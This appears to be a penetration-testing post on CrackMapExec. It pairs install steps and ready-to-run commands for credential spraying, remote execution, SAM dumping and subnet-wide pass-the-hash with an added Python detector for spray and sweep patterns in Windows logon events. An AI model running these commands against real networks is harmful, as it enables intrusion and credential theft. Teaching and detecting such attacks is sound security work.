

S1REN
Going down the range.
So let's discuss CrackMapExec a bit.
The more targeted your user/password or hash list, the more targeted your attack.
This tool is the go-to for internal engagements when performing large sweeps or 'credential spray' attacks across a variety of protocols.
I encourage you to do some research on what protocols crackmapexec supports!
+ Here's where you're going to get it:
https://github.com/byt3bl33d3r/CrackMapExec
+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec
Examples:
--> Execute 'whoami' (the protocol, here smb, is the first positional argument in current CrackMapExec releases):
crackmapexec smb 192.168.1.5 -u Administrator -p 'PASS' -x whoami
--> Query the domain's Administrator account, using the smbexec execution method:
crackmapexec smb 192.168.1.5 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PowerShell version table (-X runs a PowerShell command instead of a cmd one):
crackmapexec smb 192.168.1.5 -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List logged-on users:
crackmapexec smb 192.168.1.5 -u 'Administrator' -p 'PASS' --lusers
--> Dump the SAM database across a subnet, authenticating as a local account:
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -p 'PASS' --local-auth --sam
--> Let's Pass The Hash against an entire subnet!
crackmapexec smb 192.168.1.0/24 -u 'Administrator' -H 'LM:NTLM' --local-auth
Don't mind me - just pwning an entire network in one sweep...
CrackMapExec!
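From the defender's side, the spray and subnet sweep above leave a recognisable footprint in Windows Security logs: one source address failing logons (event 4625) for many different accounts, or succeeding (event 4624) with the same local account on many hosts, inside a short window. The following added example is not from the original post or the CrackMapExec project; it parses constructed, simplified 4625/4624 event lines and flags both patterns. The pipe-delimited line format, the field order and the thresholds are assumptions chosen for illustration, not a real log format.

```python
"""Heuristic detection of credential-spray and subnet-sweep logon patterns.

Added example, not part of the original post or of CrackMapExec. Input is a
constructed, simplified log format (an assumption for this example):
    timestamp|event_id|target_host|account|source_ip|auth_package
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

FAILED_LOGON = "4625"      # Windows Security: an account failed to log on
SUCCESSFUL_LOGON = "4624"  # Windows Security: an account was successfully logged on

# Constructed sample events (assumed format, see module docstring).
SAMPLE_EVENTS = """\
# spray: one source fails against six accounts within 20 seconds
2024-01-10T09:00:01|4625|WS01|alice|10.0.0.50|NTLM
2024-01-10T09:00:05|4625|WS01|bob|10.0.0.50|NTLM
2024-01-10T09:00:09|4625|WS01|carol|10.0.0.50|NTLM
2024-01-10T09:00:13|4625|WS01|dave|10.0.0.50|NTLM
2024-01-10T09:00:17|4625|WS01|erin|10.0.0.50|NTLM
2024-01-10T09:00:21|4625|WS01|frank|10.0.0.50|NTLM
# sweep: same source succeeds as the local Administrator on six hosts in a minute
2024-01-10T09:10:00|4624|WS01|Administrator|10.0.0.50|NTLM
2024-01-10T09:10:10|4624|WS02|Administrator|10.0.0.50|NTLM
2024-01-10T09:10:20|4624|WS03|Administrator|10.0.0.50|NTLM
2024-01-10T09:10:30|4624|WS04|Administrator|10.0.0.50|NTLM
2024-01-10T09:10:40|4624|WS05|Administrator|10.0.0.50|NTLM
2024-01-10T09:10:50|4624|WS06|Administrator|10.0.0.50|NTLM
# benign: a user mistyping a password twice, hours apart, then logging on
2024-01-10T08:00:00|4625|WS02|carol|10.0.0.77|Kerberos
2024-01-10T11:30:00|4625|WS02|carol|10.0.0.77|Kerberos
2024-01-10T11:30:20|4624|WS02|carol|10.0.0.77|Kerberos
"""


@dataclass
class AuthEvent:
    when: datetime
    event_id: str
    host: str
    account: str
    source_ip: str
    package: str


def parse_events(text):
    """Parse the assumed pipe-delimited format into time-sorted AuthEvent objects."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, eid, host, account, src, pkg = line.split("|")
        # account names are case-insensitive on Windows, so normalise them
        events.append(AuthEvent(datetime.fromisoformat(ts), eid, host, account.lower(), src, pkg))
    return sorted(events, key=lambda e: e.when)


def _by_source(events, event_id):
    """Group events of one event ID by source IP, preserving time order."""
    groups = defaultdict(list)
    for e in events:
        if e.event_id == event_id:
            groups[e.source_ip].append(e)
    return groups


def _window_max(events, window, key):
    """Return the largest set of distinct key(e) values found inside any
    time window of the given length. events must be sorted by time."""
    best = set()
    for i, start in enumerate(events):
        values = set()
        for e in events[i:]:
            if e.when - start.when > window:
                break
            values.add(key(e))
        if len(values) > len(best):
            best = values
    return best


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Credential spray: one source failing logons for many distinct accounts
    within `window`. Returns {source_ip: sorted account list}."""
    findings = {}
    for src, evs in _by_source(events, FAILED_LOGON).items():
        accounts = _window_max(evs, window, lambda e: e.account)
        if len(accounts) >= min_accounts:
            findings[src] = sorted(accounts)
    return findings


def detect_sweep(events, window=timedelta(minutes=5), min_hosts=5):
    """Subnet sweep: one source succeeding with the same account on many
    distinct hosts within `window` (the defender-side view of a --local-auth
    sweep). Returns {(source_ip, account): sorted host list}."""
    findings = {}
    for src, evs in _by_source(events, SUCCESSFUL_LOGON).items():
        per_account = defaultdict(list)
        for e in evs:
            per_account[e.account].append(e)
        for account, acc_evs in per_account.items():
            hosts = _window_max(acc_evs, window, lambda e: e.host)
            if len(hosts) >= min_hosts:
                findings[(src, account)] = sorted(hosts)
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for src, accounts in detect_spray(evs).items():
        print(f"SPRAY  source={src} accounts={accounts}")
    for (src, account), hosts in detect_sweep(evs).items():
        print(f"SWEEP  source={src} account={account} hosts={hosts}")
```

Both detectors are deliberately simple sliding-window counts; in a real deployment the thresholds would be tuned per environment (service accounts and vulnerability scanners legitimately touch many hosts), and the source field would come from the IpAddress value of the event rather than a constructed line.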